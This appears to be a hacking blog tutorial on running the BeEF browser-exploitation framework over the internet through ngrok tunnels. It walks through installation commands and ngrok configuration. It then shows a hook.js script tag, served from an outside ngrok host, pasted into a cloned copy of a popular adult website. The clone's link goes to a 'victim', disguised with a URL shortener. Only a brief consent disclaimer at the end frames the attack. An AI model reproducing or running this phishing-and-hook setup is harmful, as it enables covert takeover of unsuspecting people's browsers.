Beef-xss over wan with custom page

Hi and welcome to hacking a rise two day we are going to be using beef-over-wan script this will let us use are beef-xss over the internet

what is beef

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. … BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

what is ngrok

Ngrok is a multiplatform tunnelling, reverse proxy software that establishes secure tunnels from a public endpoint such as internet to a locally running network service while capturing all traffic for detailed inspection and replay.

what is beef-over-wan

Browser Exploitation Framework is a Open-source penetration testing tool that focuses on browser-based vulnerabilities .This Python Script does the changes Required to make hooked Linked Accessible Over WAN .So anyone can use this framework and Attack Over WAN without Port Forwarding [NGROK or any Localhost to Webhost Service Required

installing

git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
cd BeeF-Over-Wan
chmod +x BeeFOverWan.py && python BeeFOverWan.py

NGROK Steps
STEP 1 : Add these Lines To ngrok.yml [Location .ngrok2/ngrok.yml ]
tunnels:
first-app:
addr: 80
proto: http
second-app:
addr: 3000
proto: http
STEP 2 : Now Start ngrok with :
ngrok start –all
STEP 3 : You will See 2 different links Forwarded to
Localhost:80 [ Link To be Sent to Victim ]
Localhost:3000 [ Your Link will be Connecting to.. ]
STEP 4 : Enter these links in Script and Follow The Steps given in Script.

Requirements
Beef-xss [Browser Exploitation Framework]
Apache
NGROK [If you want to do this without Port Forwarding]

right now we got that out the way we can now start Beef-over-wan so open a terminal and type ngrok start --all
Beef-xss over wan with custom page 11

now we start beef-over-wan and the apache2 server so open a terminal and type service apache2 start then cd BeeF-Over-Wan and then python BeeFOverWan.py

Beef-xss over wan with custom page 12

now we press 0 and then enter this will show us the ngrok settings if u didn’t already set them

Beef-xss over wan with custom page 13

Beef-xss over wan with custom page 14

now we hit enter and it ask us to gave the ngrok link we wanna send to the target so we use the one thats running on port 80 in my case its 2504e17a.ngrok.io so i copy it with out the http and pasted it in to the terminal and hit enter

Beef-xss over wan with custom page 15

Beef-xss over wan with custom page 16

now we add the url for panel to connect to so the url running on port 3000 we wanna copy the url in my case its 7a77ef5a.ngrok.io so we copy and pasted it in

Beef-xss over wan with custom page 17

now we are with few secs it and u see this pop up
Beef-xss over wan with custom page 18

now copy the link for the panel and paste in to firefox my link is https://7a77ef5a.ngrok.io/ui/authentication this take you to the login page of beef-xss

Beef-xss over wan with custom page 19

now we log in the default password and username is beef for both when u log in u are greeted with this page

Beef-xss over wan with custom page 20

now we minimize the panel for beef-xss and open two terminals in both type cd /var/www/html now in one type nano beef.html and copy this script

"<"script" src="http"://2504e17a.ngrok.io:80/"hook.js">
"<"/script>"

Beef-xss over wan with custom page 21

Beef-xss over wan with custom page 22

now in the other terminal wget and the url you wanna clone for this im going to use pornhub.com as its the most stay on pornsites so gave us more chance keeping them hooked

Beef-xss over wan with custom page 23

Now we type ls and gedit index.html

Beef-xss over wan with custom page 24

it will open the index file in a text editor and we paste the “<"script src="http://2504e17a.ngrok.io:80/hook.js">
<"/script>” under the title in the file

Beef-xss over wan with custom page 25

now we send this url http://2504e17a.ngrok.io target and they click it they are hooked

Beef-xss over wan with custom page 26

now we can start making command on the targets browser but me i rader use a link shorter like bitly

Disclamer

dont use this for evil in other words dont use this with out the persons consent as i dont take responsibility for your actions

pentester
Hi im the laughing man im a pentester and the owner of Hacking a rise

Leave a Reply